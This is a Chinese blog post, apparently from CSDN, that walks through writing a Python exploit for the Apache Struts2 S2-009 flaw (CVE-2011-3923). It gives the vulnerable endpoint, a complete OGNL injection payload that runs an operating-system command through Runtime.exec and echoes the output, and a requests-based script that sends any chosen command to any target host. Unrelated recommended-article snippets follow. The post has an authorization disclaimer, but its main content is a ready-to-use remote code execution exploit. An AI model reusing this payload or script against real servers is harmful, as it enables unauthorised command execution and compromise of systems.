浅学安全开发python POC/EXP编写(s2-009)

最新推荐文章于 2024-07-25 09:58:57 发布
最新推荐文章于 2024-07-25 09:58:57 发布
阅读量1.1k 收藏
点赞数 1
分类专栏: 渗透测试 文章标签: 安全 servlet mvc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ddchggf/article/details/126077918
版权

浅学安全开发python POC/EXP编写,通过(s2-009)练手

未经授权请勿利用文章中的技术 资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果 和损失,均由使用者本人负责。

完整代码:poc/s2-009.py at main · san1one/poc · GitHub

struts-s2-009 代码执行 (CVE-2011-3923)

Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。

漏洞触发地址

/ajax/example5.action

payload

/ajax/example5.action?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27id%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]

 我们主要通过python requests模块,模拟http请求,先加载requests,os,sys模块,

通常会出现SSLError 请求异常,SSL错误,证书认证失败问题解决,我们将解决warning信息,

调用关闭警告信息

requests.packages.urllib3.disable_warnings()

定义我们的exp有参函数,通过requests模块get方法进行http请求及响应的接收,返回响应结果。

 res=requests.get("{}{}".format(host,payload))
  try:
    if res.status_code==200:
      print((res.content).replace(b'\x00',b''))
    else:
      print("[-] info: This link is not vulnerable.")
  except Exception as e:
    print("[-] info: This link is not vulnerable.")

主函数调用exp函数,获取运行python脚本文件的时候命令行参数

  if len(sys.argv) < 3:
    print('[+]  \033[36mfor example: https:127.0.0.1   whoami \033[0m')
  elif len(sys.argv) ==3:
    try:
      host=sys.argv[1]
      commod=sys.argv[2]
      exp_commod(host,commod)
    except Exception as e:

python s2-009.py  http:127.0.0.1 whoami

 

san1one
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
浅学一下Python中的变量是什么
wu6di6chao6ren的博客
03-03 1347
了解Python中的变量是什么,标识符是什么,以及他们的命名规则,作为一名程序员,了解正确的书写规范,对以后的编程之路有很大的帮助。
python基础学习浅学深浅复制
rrrrrwhwyh的博客
03-18 573
1.深浅复制 打比方:有糖纸和糖,深复制就相当于糖纸和糖,而浅复制就只有糖纸 id(object)返回的是对象的“身份证号”(在c++中代表在内存中的地址),唯一且不变。 令外,用is判断两个对象是否相等时,依据就是这个id值。 id查看内存空间地址的。 id查看的地址一样,可以说明它们指向的是同一片空间 小知识点: a = [1,2,3,4] b = a id(a) id(b) #此时的a和b的id是一样的 a.append(4) id(a) id(b) #此时的a和b的id还是一样的,而且没
python浅学笔记19-Web开发
u010425940的专栏
05-31 145
学习文档 from https://www.liaoxuefeng.comWeb开发HTTP协议简介HTML简介WSGI接口使用Web框架使用模板 Web开发 最早的软件,运行在大型机上,使用者使用 哑终端 登陆到大型机上运行软件。后来有了PC,出现CS架构(有客户端部分),如果客户端需要频繁改动,很不便,就出现了BS架构。 只要有Browser,就可以访问web应用。 Web开发经理的阶段 1....
浅学vue-router -- 大二下
weixin_50948265的博客
04-14 947
目录vue-router基本使用配置路由的默认路径关于router-link的属性动态路由路由的懒加载三种写法嵌套路由参数传递导航守卫keep-alive 箭头函数中的this就是找最近的作用域中的this vue-router 就是通过互联的网络把信息从源地址传到目的地址的活动,vue-router用于设定访问路径,将路径和组件映射起来 vue-rounter就是用于单页面富应用,用来管理不同组件在页面中的显示情况 改变url但页面不刷新,有以下的方法可以实现: 通过直接赋值location.hash来
python(2)浅学
weixin_45523280的博客
11-05 145
方法三:poi.keys(), poi.keys(),输出所有key值或value值----(这地方函数获取的key是可视化图的方式呈现的,因此需要通过列表格式表现)这个地方容易搞迷糊了,因此还需要多加练习。2,使用dict.fromkeys。(三)字典的元素直接访问。(四)字典元素的挨个访问。方法2:poi.get。
python浅学笔记20-异步IO
u010425940的专栏
05-31 204
学习文档 from https://www.liaoxuefeng.com异步IO协程 Coroutineasyncioasync/awaitaiohttp 异步IO cpu速度远远快于 网路 磁盘 IO 在一个线程里,IO会阻塞其它代码的执行。为了不阻塞,就要用多线程或多进程,虽然并发可以解决这个问题,但是系统不能无上限的增加线程,系统切换线程的开销也很大 另一种解决问题的方法异步IO, 异步模...
浅学Java】端口号 / UDP
qq_52276036的博客
08-10 1074
使用UDP传输数据,一定要注意报文的大小,如果长度超过64KB就可能会丢失一部分数据。为了使这个问题能够解决,那数据报就必须指明它对应哪个程序,此时就引入了端口号来达到这个目的。注意:这里的调试是通过网络发送请求的形式进行调试,而不是打断程序进行调试,这就可以在调试的时候不影响业务的处理。,如果校验和正确,并不能说明数据一定正确,如果校验和错误,那说明数据一定错误。端口号和PID的作用一样,都是为了区别进程,但是在网络编程中不使用PID来区别程序呢?,当数据报到来时,网卡就会根据收到的。...
浅学爬虫基础--day1
qq_41813416的博客
01-16 266
从今天开始学习并且发布爬虫基础内容,和大家一起进步,一起成长
浅学一下python
weixin_70724799的博客
08-02 84
浅学python
xml浅学笔记
05-15
1、XML AJAX: Asynchronous Javascript And Xml 1、什么是XML eXtensible Markup Language 可扩展的 标记 语言 XML的标记没有预定义过,需要自行定义 XML的宗旨是做数据传递的,而非数据显示 ...
浅学二极管与三极管
06-24
### 浅学二极管与三极管 #### 一、二极管基础 ##### 1.1 PN结概述 二极管的核心是**PN结**。**PN结**是通过特殊的制造工艺,在同一块半导体材料(通常是硅或锗)上,通过扩散作用将**P型半导体**和**N型半导体**...
浅学AS,设置Button点击事件的三种方式
01-03
这里就是通过布局文件中Button控件的属性值onClick=”click”实行回调函数click,代表着点击按钮有click方法响应。 回调函数代码如下,首先要通过id找到对应的按钮 myBtn_one.findViewById(R.id.btn_one);...
浅学RC充放电电路
06-24
### RC充放电电路知识点详解 #### 一、电容充放电原理 **1.1 电容充电** - **定义**: 当电容器接入电路并接通电源时,正极板上的自由电子通过电源向负极板移动,使得正极板失去负电荷而带正电,负极板获得负电荷而...
浅学电子幸运大转盘知识
06-25
### 电子幸运大转盘知识点解析 #### 一、电路设计概述 电子幸运大转盘是一种基于电子技术的娱乐装置,常用于抽奖等场合。它通过电路设计实现了LED灯的流水循环显示,模拟了转盘转动的效果,并最终随机停在一个位置...
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1420
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
kettle spoon 免安装包
08-01
kettle spoon 免安装包
2024江西省行政区划矢量图层-省市县乡镇四级行政区划数据下载-带python代码
最新发布
08-01
2024最新江西省行政区划矢量图层数据,包含省、市、县、乡镇四级行政区划数据下载,附带shp转geojson的python代码
大数据中心建设方案.pptx
08-01
大数据中心建设方案.pptx
静态方法中使用jdbctemplate_JdbcTemplate浅学
06-13
JdbcTemplate是线程安全的,但是需要保证JdbcTemplate实例的线程安全,即在多线程环境中需要保证同一JdbcTemplate实例不会被并发访问。 下面是一个示例代码: ``` public class JdbcUtils { private static ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值